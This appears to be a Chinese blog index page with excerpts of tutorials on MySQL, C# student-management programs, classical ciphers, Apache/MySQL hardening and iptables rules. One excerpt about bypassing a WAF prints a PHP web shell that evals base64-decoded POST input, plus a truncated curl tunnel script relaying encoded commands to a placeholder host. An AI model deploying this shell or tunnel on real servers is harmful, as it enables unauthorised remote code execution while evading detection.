MySQL基本操作

创建数据库

语法

CREATE DATABASE 数据库名 [CHARACTER SET 字符编码 COLLATE 字符集];

例如我们创建一个名为game的数据库,并使用utf8字符编码和utf8_general_ci字符集

create database game CHARACTER SET utf8 COLLATE utf8_general_ci;

删除数据库

语法

DROP DATABASE 数据库名;

例如我们想删除game数据库

DROP DATABASE game;

显示当前Mysql Server有哪些数据库

SHOW DATABASES;

选[……]

Read more

MySQL数据库安装与使用Navicat工具操作MySQL

Mysql是最流行的关系型数据库管理系统,在WEB应用方面MySQL是最好的RDBMS(Relational Database Management System:关系数据库管理系统)应用软件之一。
– 1.数据以表格的形式出现
– 2.每行为各种记录名称
– 3.每列为记录名称所对应的数据域
– 4.许多的行和列组成一张表单
– 5.若干的表单组成database

数据库(Database)是按照数据结构来组织、存储和管理数据的仓库,
每个数据库都有一个或多个不同的API用于创建,访问,管理,搜索和复制所保存的数据。
我们也可以将数据存储在文件中,但是在文件中读写数据速度相对较慢。
所以,[……]

Read more

C#实现学生管理系统(二)-入门版

通过硬盘存储学生数据,实现重新打开程序后数据任然存在,切增删改操作自动保存数据。
1.利用|字符充当隔离符号,将Student结构数据转换为一行字符串
例如:
学号|姓名|年龄|性别|班级|语文成绩|数学成绩|数学成绩

C#中File类提供ReadAllLines函数,功能是读取所有行数据,返回类型为string数组,每组数组存储对应行的数据。所以我们可以通过回车符号(\r\n)存入我们的Student结构的数组,利用\r\n字符充当隔离符号
例如:
学号|姓名|年龄|性别|班级|语文成绩|数学成绩|数学成绩\r\n
学号|姓名|年龄|性别|班级|语文成绩|数学成绩|数学成绩\r\n
学号|[……]

Read more

C#实现学生管理系统(一)-入门版

系统设计
1.实现用户和密码登陆
2.定于一个学生结构(struct),其中包含学生的学号、姓名、年龄、性别、班级、语文成绩、数学成绩、英语成绩
3.实现录入信息、修改信息、删除信息、打印信息,并有良好的控制台提示界面

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Collections;

namespace StudentManagementOS
{
    class Program
    {
        struct Stude[......]

Read more

简单替换密码

简单替换密码(Simple Substitution Cipher),凯撒密码是通过明文中所使用的字母表平移来生成密文。但是,如果我们将字母表中的26个字母,分别与这26个字母本身建立一对一的对应关系,那么无论哪一种对应关系就都可以作为密码来使用。这种将明文中所使用的字母表替换为另一套字母表的密码称为简单替换密码,凯撒密码也可以说是简单替换密码的一种。

例如,这是一个简单替换密码的对应表(密码表)

图片来源于互联网

Plain:    abcdefghij...
Cipher:   dgaibfcjeh...

使用时,加密者查找密码表中需要加密的消息,并且写下密码表中对应的[……]

Read more

凯撒密码

凯撒密码(Caesar cipher)是一种相传尤利乌斯·凯撒曾使用过的密码。凯撒于公元前100年左右诞生于古罗马,那是一位著名的军事统帅。

图片来自维基百科

凯撒密码,也称为移位密码,是最简单的加密形式之一。凯撒密码是通过将明文中所使用的字母表按照一定的字数“平移”来进行加密的。

例如,这是Caesar Cipher加密的消息,使用3的右移。

图片来自维基百科

Plain:    ABCDEFGHIJKLMNOPQRSTUVWXYZ
Cipher:   XYZABCDEFGHIJKLMNOPQRSTUVW

使用时,加密者查找明文字母表中需要加密的消息中的每一[……]

Read more

Apache安全配置

1 安全策略

1.1 安全目录

.htaccess做目录安全保护的,欲读取这保护的目录需要先键入正确用户帐号与密码。这样可做为专门管理网页存放的目录或做为会员区等。

AllowOverride All

LoadModule rewrite_module modules/mod_rewrite.so

在自动要认证的目录下建立. htaccess文本(windows中用记事本另存为建立)

1.1.1 .htaccess配置:

(.htaccess文件可以相当于当前目录的httpd.conf配置,设置时尤其注意.htaccess文件的访问权限,避免被有心人恶意修改,后果不堪设想)

A[……]

Read more

MySQL安全配置

MySQL_Help_Link

1 安全策略

1.1 管理意义上的数据安全

访问 MySQL 数据库必须首先访问数据库的某个权限、即以某个权限模式用户的身份登录,大部分的安全管理主要通过模式用户的权限来实现。

MySQL 的相关权限信息主要存放在 grant tables 的系统表中,即 mysql.User(全局级别权限) 、 mysql.db (数据库级别权限)、 mysql.Host(数据库级别权限) 、mysql.table_priv(表级别权限) 和、 mysql.column_pr(列级别权限)表中, MySQL 启动时装入内存。应尽量使用 GRANT 、REVOKE 、C[……]

Read more

加密隧道绕过WAF

采用base64编码使WAF无法识别接收内容从而达到目的,在必要的情况下发送也要进行编码防止WAF检测

server
<?php if($_POST['c']!='') @eval(base64_decode($_POST[z0]));
?>


tunnel
<?php
$handle=curl_init();
$DATA=array();
$DATA=$_POST;
$DATA['c']=base64_encode(substr($DATA['c'],1));
curl_setopt($handle,CURLOPT_URL,'http://xxx/xxx.php');[......]

Read more

iptables 笔记

不允许接受icmp数据包到本地
iptables -A INPUT -p icmp --icmp-type 8 -j DROP

不允许发送未知数据包到本地
iptables -A INPUT -p all -m state --state INVALID -j DROP

允许已经允许过的连接和被动请求数据包发送到本地
iptables -A INPUT all -m state --state ESTABLISHED,RELATED -j ACCEPT

检查该连接中第一个数据包,并检查该数据包是否包含syn标记,符合两项条件才允许进入。
iptables -A INPUT -p tcp[......]

Read more